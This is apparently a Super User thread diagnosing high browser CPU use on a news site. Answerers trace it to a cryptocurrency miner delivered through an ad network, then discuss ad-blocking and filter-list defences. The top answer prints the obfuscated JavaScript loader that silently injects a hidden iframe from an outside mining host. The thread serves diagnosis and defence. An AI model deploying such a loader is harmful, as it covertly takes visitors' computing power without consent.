Chrome uses 80% CPU when I visit a specific website

Whenever I try to visit this particular website, chrome CPU usage shoots up to at least 75% and my laptop get way louder. If I close the tab everything goes back to normal.

Windows Task Manager CPU usage

Chrome Task Manager CPU Usage

RAM usage never goes up. My naive guess is the website is trying to mine cryptocurrency. But I this happens only if I use Chrome, Edge works normally when I visit this website. The website in question is www.123telugu.com. What could be the reason for this behavior?

Rohith Reddy

Posted 2018-03-10T18:30:07.560

Reputation: 753

Im using Chrome and my CPU usage doesnt change on the site. Im guessing the issue is local to your PC, not the site. – Keltari – 2018-03-10T18:34:27.763

Yeah, that was my second guess. What could be the issue here? – Rohith Reddy – 2018-03-10T18:36:16.750

12Being a risky fellow, I visited that site with firefox. That specific tab kicked my CPU to 65% instantly, which is almost how quickly I closed the tab. – fred_dot_u – 2018-03-10T18:50:04.123

What happens if I click those links? It borrows my computer for a bit, or now I have malware? – Mazura – 2018-03-11T00:06:41.167

about the cryptocurrency miner...in a comment to another SE posting someone was making a similar claim regarding weather.com

– coderworks – 2018-03-11T02:47:45.903

You can test if its miner with https://github.com/stevespringett/disable-webassembly

– Vadzim – 2018-03-11T21:24:45.740

2I went to that site and same happened so its probably a crypto miner – Suici Doga – 2018-03-12T03:56:16.160

14"Is it a cryptocurrency miner?" It's always a crypto miner. – Ian Kemp – 2018-03-12T05:40:41.873

1Free advert to visit the site :) – Rui F Ribeiro – 2018-03-12T19:50:15.917

Answers

116

Yes, it’s a crypto currency miner. Hosted at www.datasecu.download, implemented in Web Assembly, communicating with its host via Websocket:

It’s distributed using a compromised advertising network:

Extract from https://s3.amazonaws.com/23ap.com/nodejs/sq9/sq_v2.js

var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);

tl;dr: Use an Adblocker already.

Daniel B

Posted 2018-03-10T18:30:07.560

Reputation: 40 502

3Hmm. uBlock Origin doesn't stop it (on Firefox at least). – DavidPostill – 2018-03-10T20:31:07.790

5Virustotal comes back clean. Does no one classify crypto currency miners on websites as malicious? – Ploni – 2018-03-11T01:48:45.963

heh, that ad network might not even be "compromised", except intentionally. – coderworks – 2018-03-11T02:49:44.503

7@Ploni there are some causes where their use isn't malicious and actually legitimate – Keith M – 2018-03-11T03:32:04.650

1ABP doesn't appear to block it either. – Matthew FitzGerald-Chamberlain – 2018-03-11T03:44:53.913

In the meanwhile, try https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl

– Madara's Ghost – 2018-03-11T09:51:36.090

@DanielB: I need to set both "third-party scripts" and "third-party frames" to neutral for the adware/malware to work. I have them blocked by default. – David Foerster – 2018-03-11T10:05:26.653

@DavidFoerster Those are certainly sensible choices. However, this isn’t the default configuration, leaving many users vulnerable. That’s why it has to be in the default block lists. – Daniel B – 2018-03-11T12:02:13.387

4I just added www.datasecu.download to my adblock filters and it blocks it now. Thanks. – Rohith Reddy – 2018-03-11T20:23:03.037

Semi-deobusficated version available at https://pastebin.com/6Ys3ihkJ (in a Pastebin because it was otherwise too long)

– Solomon Ucko – 2018-03-11T21:15:59.563

@RonJohn I'd argue that cryptocurrency malware isn't that bad, at least compared to getting Forbes'd. I'd rather have my CPU overused for a couple of minutes than malware installed on my computer. Not at all coincidentally, both are prevented by (a) having a strict adblocker and (b) refusing to make exceptions.

– Fund Monica's Lawsuit – 2018-03-12T06:09:17.950

4@Ploni Crypto miners are no more malicious than your printed newspaper ad. One taps processing power of your CPU, the other taps processing power of your brain, both do it for the financial gain of its operator. You can close both by closing the page, therefore: "not malicious." – Agent_L – 2018-03-12T09:03:54.987

1Do keep in mind that comments are not for extended discussion. You might want to take the question of whether crypto mining in ads is malicious to [chat]. – Daniel B – 2018-03-12T09:11:10.460

2@Agent_L that's debatable, what if someone knew how to access and use your brain without you knowing about it. At least you'd like to know what they are doing. In this case, no warning whatsoever was provided. – CPHPython – 2018-03-12T15:19:22.920

For ublock you can load the noCoin filter list: https://github.com/hoshsadiq/adblock-nocoin-list/

This datasecu website is already included.

jho

Posted 2018-03-10T18:30:07.560

Reputation: 91

Just disable javascript and the website won't be able to use your pc's cpu. If you use chrome. Right click -> inspect element -> network (tab) -> settings -> disable javascript.

Sebastian Nielsen

Posted 2018-03-10T18:30:07.560

Reputation: 133